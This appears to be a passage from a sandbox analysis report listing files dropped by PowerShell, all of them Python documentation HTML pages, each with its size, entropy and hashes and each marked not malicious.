                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="13. What Now?" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/whatnow.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Reading this tutorial has probably reinforced your interest in using Python . you should be eager to apply Python to solving your real-world problems. Where should you go to learn more? This tutori..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Reading this tutorial has probably reinforced your interest in u
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (664), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):127905
                                                                                                    Entropy (8bit):4.949790937428787
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:yqyJMH1rYB4bwqdSvXWC+ghavjrzOTH2IgHmAfFig8d/E1SjWWpM1W0AhejDa00B:R03vmitc5hM8nqOg
                                                                                                    MD5:912A7905732ACAEA3BCA0D124E865544
                                                                                                    SHA1:F171DCA98B2D818B238DA7F074950DB45253C4EC
                                                                                                    SHA-256:6AD97EA7669DDA9F9B633F8D6F41C64DF5C1474D68FBD99F599B8D502D5DAAAE
                                                                                                    SHA-512:24B90D9A2C4E8DF6E6ABEFDD4A0844C51000AE39CD2F8F8A2E188891937533A8D4C29B059E6F4F314749CA7C4E72C2D21BBE774969CB5932C298094A51B59E5A
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="1. Command line and environment" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/using/cmdline.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The CPython interpreter scans the command line and the environment for various settings. CPython implementation detail: Other implementations. command line schemes may differ. See Alternate Impleme..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The CPython interpreter scans the command line an
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (511), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):121462
                                                                                                    Entropy (8bit):4.978562868285762
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:wqyyyM6LzJ68Kz9eFlIdODWOmnMY8l9oUz4A5DwYaUtCpxzmKd6cYA4sryvQEP+q:ZvcIkI70u/Sexg
                                                                                                    MD5:209A4D0ADB10A81C94B22B7FED155435
                                                                                                    SHA1:06FA72A4BD7A153A0E93FBCEAAB4839163A06AE3
                                                                                                    SHA-256:453C33E86BA2DD89DE4C46E4B518C53D23D78704580C3D32D5BA4D643051C991
                                                                                                    SHA-512:7AA61DC921FD567D63B05B6343787A4D84F787BE205A54B72C863C25204E20B8CE595DC61C2CD9FA4128AC1B77B9F23B4208779EF0AA64B89D64E843E38E5D5F
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="3. Configure Python" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/using/configure.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Build Requirements: Features required to build CPython: A C11 compiler. Optional C11 features are not required., Support for IEEE 754 floating point numbers and floating point Not-a-Number (NaN)., ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Build Requirements: Features required to build CPython: A C11
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13640
                                                                                                    Entropy (8bit):4.829913744622136
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:W9Qdrt3KHqkX1v1MxAMgln1TMbEr7s/AMx+6rn5TMb5A76dqEC:oHqkl2Sln1TMb/tfrn5TMC76dqEC
                                                                                                    MD5:E629F6D08B5CBF68711239116F2D153D
                                                                                                    SHA1:0A3C4E73415C47F5AB1B316956F66B76B01F93DA
                                                                                                    SHA-256:3D130F8FFF4AF93FB6F87212B0C4751DAA28C3487A21A09400BA2447D39995B7
                                                                                                    SHA-512:11EE6AF6020A9F56F6637F0F17280021F1A6DE1CFB66479E8FBC09F41B3058BA3B5A9F254DE1D387C25EC402CF91A94F207E90895632D1D1E6BF26CD56CDE12C
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="6. Editors and IDEs" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/using/editors.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="There are a number of IDEs that support Python programming language. Many editors and IDEs provide syntax highlighting, debugging tools, and PEP 8 checks. Please go to Python Editors and Integrated..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="There are a number of IDEs that support Python programming lang
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):25267
                                                                                                    Entropy (8bit):4.9169090039341885
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:xRTHqklYcanHTM6/Q0oYE1iSCg7R+njTMK76dqEC:vqyYjzMB0oY474XMK764N
                                                                                                    MD5:91442B0CDB626AECD1FCA95CC7EA7299
                                                                                                    SHA1:1EAE66DFB7809AA71B0E1CC494D9FE73734B113C
                                                                                                    SHA-256:D321793916D42A4763E910D3B10533738EEDC1D7F7C68FC07FCB625ACE9D8DA3
                                                                                                    SHA-512:F60BC7C4536645522993744A7CCBAD72F26D1A843DBF2DE0325308C156F9455839D986C05FE973D47A42F6430B3106EB7A3214426834B1E2BEF27FEA912BC47F
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Python Setup and Usage" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/using/index.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This part of the documentation is devoted to general information on the setup of the Python environment on different platforms, the invocation of the interpreter and things that make working with P..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This part of the documentation is devoted to general informati
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):28440
                                                                                                    Entropy (8bit):4.9449690982497705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:2eYYqygDGj3MobqoA73E+qnq6QXcUjRZzG0NDrjbMe764N:2ejqyrMobk3/ckG0lMe764N
                                                                                                    MD5:8ED1D0E1A76EFFF7A0E40973E2CF62B2
                                                                                                    SHA1:BC7CED2DED0E28635D72A51211FCF5C5DB44E01F
                                                                                                    SHA-256:DE67924AC1D7329744E9E9E0ADCEFDC9E6A7B7DC9099706128BEE293E8B556A9
                                                                                                    SHA-512:7950FC1156BA231EA15B24AC611048EFC5C5BF96EA016210E0040F50FE320F07179675F51AFD4A6B22EC3FFB7026824CB9AF57B0C7A2EBAB1AED7B087683772E
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="5. Using Python on a Mac" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/using/mac.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Author, Bob Savage < bobsavage@mac.com>,. Python on a Mac running macOS is in principle very similar to Python on any other Unix platform, but there are a number of additional features such as the ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Author, Bob Savage < bobsavage@mac.com>,. Python on a Mac runn
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):28358
                                                                                                    Entropy (8bit):4.904419458161685
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:Nqy2P+uMTDO6qwptAikn+wH9dNAszPXcMJ764N:Nqy6Mm6qotAikn/HbNAsAMJ764N
                                                                                                    MD5:D3678F95FF2B45CF2F0EDD96F917DA8E
                                                                                                    SHA1:A3651C7129515A9DC204395BA5F5DFC3B7D17BDC
                                                                                                    SHA-256:2AB6EA120955D3948ECF172082C82972B00317EC2343A950AA0059306E9CF97B
                                                                                                    SHA-512:AD4B75E3C474F646470489C7559F452233E01D3BED574A4222FF2AFA23238569175B2D6CDF60D9F43E39E2B21EAC433A9DEA8C3F597C8191996B73E486577054
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="2. Using Python on Unix platforms" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/using/unix.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Getting and installing the latest version of Python: On Linux: Python comes preinstalled on most Linux distributions, and is available as a package on all others. However there are certain features..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Getting and installing the latest version of Python:
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (455), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):117946
                                                                                                    Entropy (8bit):4.945217677948536
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:CqyEMtx3JAz728MwdGq+BAVTbstCz0y92nHKWEdENa8MN2kiY2c3XtJdn8+h9kQv:cTG72ubKfcWvMNBjLkzg
                                                                                                    MD5:76F574E9DDE85E934908251E3CBEAB38
                                                                                                    SHA1:64DF75C7E9833739F0B20B36BA8097AE0652ABFB
                                                                                                    SHA-256:751D0BFC16448FC831F29128DE6B4366E20F89479F86EF94DC3DE13A473E33D5
                                                                                                    SHA-512:0EAF90ED4F5DA58B239A0E9D706ABB98811DA21B46649B83BA101B6EB4DEC8AF2FA29BCFBA904CA6FA7E8F0861F3D1F8669B49AD985583086C0D1788E19C95FF
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="4. Using Python on Windows" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/using/windows.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This document aims to give an overview of Windows-specific behaviour you should know about when using Python on Microsoft Windows. Unlike most Unix systems and services, Windows does not include a ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This document aims to give an overview of Windows-specif
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (945), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):142029
                                                                                                    Entropy (8bit):4.878910837218729
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:menqyIMRoM/FonlVcWkL2tV2u0Vkm44pffltuzGm/VGJbPYOK/L6aNy8wDy27AVC:meboM/FGlVcWmVfloOeN367AVIo5jng
                                                                                                    MD5:CBAFF11F8495548630D30C9B5B4AA031
                                                                                                    SHA1:D1D2090183C313F73B017624C1FDFA6CE337E83C
                                                                                                    SHA-256:4A9D9FA1FDA8DEFDBC8BAFD442E8D7D1794F081E8E49FF0C4EC2B617D1F0BBE5
                                                                                                    SHA-512:43C720D786A0EAB1EB3A188FB74CDD0DC4B1D98004E8C5FFA0B695AF95CEA17522DE06A9E47EB2080697DB5DC5E827E79E9BCEF2DF9B990E8A26CB6B31BA0A80
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="What.s New in Python 2.0" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/whatsnew/2.0.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Author, A.M. Kuchling and Moshe Zadka,. Introduction: A new release of Python, version 2.0, was released on October 16, 2000. This article covers the exciting new features in 2.0, highlights some o..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Author, A.M. Kuchling and Moshe Zadka,. Introduction: A n
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (591), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):90859
                                                                                                    Entropy (8bit):4.896114568721273
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:QqyftMx0Br6GQQQKuBWe3OzokueYNMSuAJGrkBG9swMp764N:yuQQQMBmzbFYJWkBBAg
                                                                                                    MD5:5FA9FEC8E48040009ED1CD726240E1AF
                                                                                                    SHA1:62FE9E7BB883E264DA82133B56A6E965DCE85DDA
                                                                                                    SHA-256:EABAB5636C1D2627859FB7DF970FFBC3AA0B3634543019702D91E060A3FB20C5
                                                                                                    SHA-512:BEEA92748A685E9F07699887CF75A595F73F62883E9BCEA42E26FAD97FDFEB458F3F3665C74894B56C397EE17867C9B634AF7E5D7880217E4BD874D7E242216C
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="What.s New in Python 2.1" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/whatsnew/2.1.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Author, A.M. Kuchling,. Introduction: This article explains the new features in Python 2.1. While there aren.t as many changes in 2.1 as there were in Python 2.0, there are still some pleasant surp..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Author, A.M. Kuchling,. Introduction: This article expl
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (866), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):147311
                                                                                                    Entropy (8bit):4.90910096671132
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:kG5GD8LwwlNfMjIqOwhkfDJQgNMW9p/2g:PGulNXffDJQng
                                                                                                    MD5:EE08DB1096AF3053660342B39F4B688E
                                                                                                    SHA1:5AAFE38C277C232470F6285F87DA0ACEEF3C41A6
                                                                                                    SHA-256:A009B2B13EC2DA43CEB3DE603FB2948EA53E4006C14373E25A80C700C65EDC1F
                                                                                                    SHA-512:38AB79479E32F249EC7788306A9C6AD035FEE146878144A1612FE6BCDA14103377418D3E3FADC7FEE2DC3B678C31D60B08457E71DCE534E5988F2CA7C6B245AB
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="What.s New in Python 2.2" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/whatsnew/2.2.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Author, A.M. Kuchling,. Introduction: This article explains the new features in Python 2.2.2, released on October 14, 2002. Python 2.2.2 is a bugfix release of Python 2.2, originally released on De..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Author, A.M. Kuchling,. Introduction: This article explai
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (584), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):248962
                                                                                                    Entropy (8bit):4.902380958485562
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:HXOiZyuyHaj2jZjAdedpBFpdhv0p+YIPBryFQNg:H+53aj2jZsePtv0p+YIPRGQNg
                                                                                                    MD5:965860F05DF37876600468559F0429B9
                                                                                                    SHA1:74D7EF3D79D67E22F25DD375E6E6A35006E3C83B
                                                                                                    SHA-256:067F5828229F67AA558B56C410260EEBCB0B0D4FBC56BA71ED0C0D1DA58B3894
                                                                                                    SHA-512:569179726FE5564328B70844619DF3D2B5B44CE6F4C9CF3AD030860DACB8813EDA6A7944480032DEC490121E6E0F1F622B9F57C928372EB0F3F5F9278D64FA4C
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="What.s New in Python 2.3" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/whatsnew/2.3.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Author, A.M. Kuchling,. This article explains the new features in Python 2.3. Python 2.3 was released on July 29, 2003. The main themes for Python 2.3 are polishing some of the features added in 2...." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Author, A.M. Kuchling,. This article explains the new fea
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (579), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):175832
                                                                                                    Entropy (8bit):4.928318870028802
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:UqyxMx6PQibe47blXYaHfmrXX9JQlDXiyjR0i+ymbziRzL3CH5dHKD8LDkG0voFy:76To+j6ZTJxGxIg
                                                                                                    MD5:EEBD4B49E5DA70D9DC4970085D1A2E49
                                                                                                    SHA1:6C752F7C1D537F5DBBB23EBD6FC3CF07D746D23F
                                                                                                    SHA-256:5BB0D6FA011AC917C419190D70F41FFBD506E02A34717D2A1EE87572EE82D599
                                                                                                    SHA-512:2A9D87B201C98765915C435A15C3007650C81CC52ED8CF8C9F0D04562FDADCAD07AE661E0F91541CF1F99DDF384FB28DCD343F4BD5731BCADA59B2FAD6E686A1
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="What.s New in Python 2.4" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/whatsnew/2.4.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Author, A.M. Kuchling,. This article explains the new features in Python 2.4.1, released on March 30, 2005. Python 2.4 is a medium-sized release. It doesn.t introduce as many changes as the radical..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Author, A.M. Kuchling,. This article explains the new f
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (466), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):264740
                                                                                                    Entropy (8bit):4.895590564769467
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:TONOEBhPR8ZtO36R9EkP2Xwhjm8D7EMqzWMcg:m6R9EyhjX4WNg
                                                                                                    MD5:DBBE35CC5E4E7CC1933655CDFD37F94C
                                                                                                    SHA1:741681554D51F4708CEC9FDCCAF13A40102D9E32
                                                                                                    SHA-256:83D369AB5B729DC7666F7F324CBB8ED02A393C7A4280A5DB524DD63EBD89FBB2
                                                                                                    SHA-512:4CBD3A206CA07718CF0680D6744BFF4988217E80A3C25CE20992560273203A1DEC97ED302332C8ECB083E7B20A12B9473D5F67D40726B8C71B1FE902AA9E95DC
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="What.s New in Python 2.5" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/whatsnew/2.5.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Author, A.M. Kuchling,. This article explains the new features in Python 2.5. The final release of Python 2.5 is scheduled for August 2006; PEP 356 describes the planned release schedule. Python 2...." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Author, A.M. Kuchling,. This article explains the new fea
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (500), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):371691
                                                                                                    Entropy (8bit):4.928713780905626
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:4zj6W6RhNB+jlx8lgl7WRVy1EWGPdsvc7F88dag:TW6Ojj8lib1EWtvAIg
                                                                                                    MD5:B5AA484EB33ABCEA5ED2B253FFC401FF
                                                                                                    SHA1:20FD2F124BE768DDE69761DA8BCADEF3A6E33763
                                                                                                    SHA-256:8B4BF10AF7C924F72B695C5CDE49E568DC71F2FE524DE87DDA80B98ADCF2BB53
                                                                                                    SHA-512:3CB618928A7E27B913A22A12BA9491AEB3B8EC51D8189604A55AD3BCD55CCA619459E3FE47A6E3F7F69C3ABE7A92ED2DC0FB41460BE6DC99DCC2B383E8029970
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="What.s New in Python 2.6" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/whatsnew/2.6.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Author, A.M. Kuchling (amk at amk.ca),. This article explains the new features in Python 2.6, released on October 1, 2008. The release schedule is described in PEP 361. The major theme of Python 2...." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Author, A.M. Kuchling (amk at amk.ca),. This article expl
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (790), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):351543
                                                                                                    Entropy (8bit):4.990853018165794
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:5B+1MdV3lQxNvr3RlYSCrP79XdHslMwYCa0YijyP4VTWJcl9c4QD3B+Lg:DgNvrTArP7FdHsS0YIyP40JS9gDOg
                                                                                                    MD5:FC528760F15E6A6EBA808F1F10FB2771
                                                                                                    SHA1:12C301D51A51147547858BB5F78450F8A70C69E6
                                                                                                    SHA-256:638F4B6A6CBE7A8B9B6DAFA0841959465E3452107C41E937A53ECD42D37A2C5A
                                                                                                    SHA-512:457FB3C18B099EA94D5837EBCC11DC6678E5BA18477E38C03D5813CE9D1C47F869E7D5A4A0661FB1C2911307A60E8959C32DE3E4975E43D4E50EFE81E9E17361
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="What.s New in Python 2.7" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/whatsnew/2.7.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Author, A.M. Kuchling (amk at amk.ca),. This article explains the new features in Python 2.7. Python 2.7 was released on July 3, 2010. Numeric handling has been improved in many ways, for both floa..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Author, A.M. Kuchling (amk at amk.ca),. This article expl
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (597), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):128484
                                                                                                    Entropy (8bit):4.8621645075751205
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:KqySMxK9YFHDbsyF3QfTzaNlXDerEBM9764N:YeslXDjtg
                                                                                                    MD5:32D5EE24490CCAB6587FA582A214B014
                                                                                                    SHA1:3B8488E5FF4CAE489750F0D7CE5279024BA2DB18
                                                                                                    SHA-256:615F32D5CA272A9788426A445A539C967817325B3A8BEF0D241904FEF2154AFE
                                                                                                    SHA-512:D97BE6E97E61174699ACF24995EEFA6F38D47A6DF9C8E3ADB857F01CF1E1C1FD82878D5842DDD7714BE30FD99904040B30FE4E08043BCDDD1805920709EC756C
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="What.s New In Python 3.0" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/whatsnew/3.0.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Author, Guido van Rossum,. This article explains the new features in Python 3.0, compared to 2.6. Python 3.0, also known as .Python 3000. or .Py3K., is the first ever intentionally backwards incomp..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Author, Guido van Rossum,. This article explains
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (872), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):75946
                                                                                                    Entropy (8bit):5.009788651972699
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:8qy2MJnM/Zrdo5rkxqxorc9qd9gvmk+7grc+My764N:MnmYsX3g
                                                                                                    MD5:6BFB9EA2A7CD5DF1830EB4F158166912
                                                                                                    SHA1:BE4A2854CFD07D4A90EA17E31503C1D05FE83B9D
                                                                                                    SHA-256:C66D77B9B9BD278407196786848D128D1A47970C2A9D8065314D958BCBB0D1D5
                                                                                                    SHA-512:440C766E54172F9D859C71C698DE19645073A2BB89DA4F101E5096E46BCF8CD346B782E238D1F84DAF0012B974DB87E359020332375F557E6552E6500AF191D1
                                                                                                    Malicious:false
